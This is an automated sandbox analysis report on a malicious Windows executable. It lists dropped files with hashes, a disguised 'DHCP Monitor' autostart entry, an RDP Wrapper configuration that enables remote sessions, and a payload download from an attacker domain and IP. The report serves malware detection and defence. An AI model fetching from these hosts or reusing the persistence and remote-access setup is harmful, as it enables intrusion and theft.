203.159.80.165	hutyrtit.ydns.eu	Netherlands		47987	LOVESERVERSGB	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	457791
Start date:	02.08.2021
Start time:	10:16:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 15s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Xjf4yH9N2t.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@27/18@11/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 85.5% (good quality ratio 84.7%) Quality average: 88.5% Quality standard deviation: 18.9%
HCA Information:	Successful, ratio: 92% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100 Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 23.211.6.115, 104.43.139.144, 20.82.210.154, 23.211.4.86, 173.222.108.210, 173.222.108.226, 40.112.88.60, 80.67.82.235, 80.67.82.211 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:17:16	API Interceptor	1x Sleep call for process: Xjf4yH9N2t.exe modified
10:17:38	API Interceptor	1x Sleep call for process: images.exe modified
10:17:45	API Interceptor	664x Sleep call for process: cmd.exe modified
10:18:12	API Interceptor	408x Sleep call for process: KetqqsbuJ.exe modified
10:18:20	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
10:18:50	API Interceptor	1x Sleep call for process: dhcpmon.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1378816
Entropy (8bit):	7.548476087877472
Encrypted:	false
SSDEEP:	24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
MD5:	8FA8F52DFC55D341300EFF8E4C44BA33
SHA1:	4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
SHA-256:	2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
SHA-512:	A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 20%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......

C:\Program Files\Microsoft DN1\rdpwrap.ini Download File
Process:	C:\ProgramData\images.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	181846
Entropy (8bit):	5.421809355655133
Encrypted:	false
SSDEEP:	768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
MD5:	6BC395161B04AA555D5A4E8EB8320020
SHA1:	F18544FAA4BD067F6773A373D580E111B0C8C300
SHA-256:	23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
SHA-512:	679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
Malicious:	false
Reputation:	unknown
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM

C:\Program Files\Microsoft DN1\sqlmap.dll Download File
Process:	C:\ProgramData\images.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	5.884975745255681
Encrypted:	false
SSDEEP:	3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5:	461ADE40B800AE80A40985594E1AC236
SHA1:	B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256:	798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512:	421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 20%, Browse Antivirus: ReversingLabs, Detection: 43%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\ProgramData\images.exe Download File
Process:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1309184
Entropy (8bit):	7.518165195771859
Encrypted:	false
SSDEEP:	24576:HCIH76DO6fx8Dgyfx8Dgxz2MqBSYe6bOnb7IwDZN2L:pH76X58Dgy58DgxiMdYe6qnb7/Z4
MD5:	2318B60075E442CB6141535E268E4DF0
SHA1:	6D2E6E0BFDB0E649E0079533ECDBE302FF9DC8B5
SHA-256:	CDBE67339A29BFE3066A18B4E68E9B19E28E449AB21CE23A85ED15E04C5255DF
SHA-512:	160013EED136F4DB2F3AB2B662E62966DAA6959C3FF5DBB8125E3E49F8D41E63CA5CA65FFE5F85370E27C39870BFE3D2DC3F09D629665B59E71E7C32A5C94413
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 20%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b..a..............P..............<... ...@....@.. .......................@............@.................................x<..O....@..(.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...(....@....... ..............@..@.reloc....... ......................@..B.................<......H........0..........s...8...@`............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......

C:\ProgramData\images.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft Vision\02-08-2021_10.17.46 Download File
Process:	C:\ProgramData\images.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.113204882778696
Encrypted:	false
SSDEEP:	3:blXlulovDluLAnyWdl+SliXln:zuWpyWn+Sk1
MD5:	4B99C50453B52153CB7CFB2810B982D8
SHA1:	FD7A010AD17F7F9D21B3F37FB8B15644CCC661C7
SHA-256:	30EE264F1887C07BD390E0AB05F62FC8E1064CAFBECA6A679C345C934CD52F08
SHA-512:	F6C9E795F955812F370565B8EAB62BEFC6EE9DA3E2619098DC3425C79539EA507C2F1CA0F7122E46692F33586E1811D5BBF4F6F40150187269025F48208CED6D
Malicious:	false
Reputation:	unknown
Preview:	..{.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.}...L.e.f.t. .W.i.n.d.o.w.s.r.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KetqqsbuJ.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Xjf4yH9N2t.exe.log Download File
Process:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\images.exe.log Download File
Process:	C:\ProgramData\images.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\microC[1].exe Download File
Process:	C:\ProgramData\images.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1378816
Entropy (8bit):	7.548476087877472
Encrypted:	false
SSDEEP:	24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
MD5:	8FA8F52DFC55D341300EFF8E4C44BA33
SHA1:	4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
SHA-256:	2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
SHA-512:	A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 20%
Reputation:	unknown
IE Cache URL:	http://hutyrtit.ydns.eu/microC.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
File Type:	data
Category:	dropped
Size (bytes):	1856
Entropy (8bit):	7.024371743172393
Encrypted:	false
SSDEEP:	48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrw8:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
MD5:	838CD9DBC78EA45A5406EAE23962086D
SHA1:	C8273AACDEE03AC0CDCDDBAA83F51D04D6A4203C
SHA-256:	6E11A62511C5BBC0413128305069B780C448684B54FAA3E8DD0B4FD3DB8C9867
SHA-512:	F7D25EF1FA6F50667DD6785CC774E0AA6BC52A2231FE96E7C59D14EFDFDDA076F6399288CF6EAC8EFA8A75727893432AA155DA0E392F8CD1F26C5C5871EAC6B5
Malicious:	false
Reputation:	unknown
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Wh8t:08
MD5:	E48AF3B9C19137DE3D4E19DBEF794B54
SHA1:	6C7EAF31502874EAD026A9A3D1778CF143198C1A
SHA-256:	6BDB6E6649C8B4CBD53189D0099AF4A4C7C51416CB6038B228FCEAEBFDCE2DDA
SHA-512:	5947A96EADF7260CAF9FDE0D0E2415AE58AAE54B48E9CAD686A3AD165BB19A025DB25C95595ADF515BDAC2129C54598B95B4E0F0653A87AE1A1490B0D570A8B2
Malicious:	true
Reputation:	unknown
Preview:	.....U.H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin Download File
Process:	C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Reputation:	unknown
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat Download File
Process:	C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
File Type:	data
Category:	dropped
Size (bytes):	327432
Entropy (8bit):	7.99938831605763
Encrypted:	true
SSDEEP:	6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
MD5:	7E8F4A764B981D5B82D1CC49D341E9C6
SHA1:	D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
SHA-256:	0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
SHA-512:	880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
Malicious:	false
Reputation:	unknown
Preview:	pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...\|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.).....{B.[...y%...i.Q.<..xt.X..H.. ..HF7g...I.3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.\|i4...i...;O...n.?.,. ....v?.5}.OY@.dG\|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...\|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`\|.B....3.....I..o...u1..8i=.z.W..7

C:\Users\user\AppData\Roaming\KetqqsbuJ.exe Download File
Process:	C:\ProgramData\images.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1378816
Entropy (8bit):	7.548476087877472
Encrypted:	false
SSDEEP:	24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
MD5:	8FA8F52DFC55D341300EFF8E4C44BA33
SHA1:	4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
SHA-256:	2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
SHA-512:	A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 20%
Reputation:	unknown
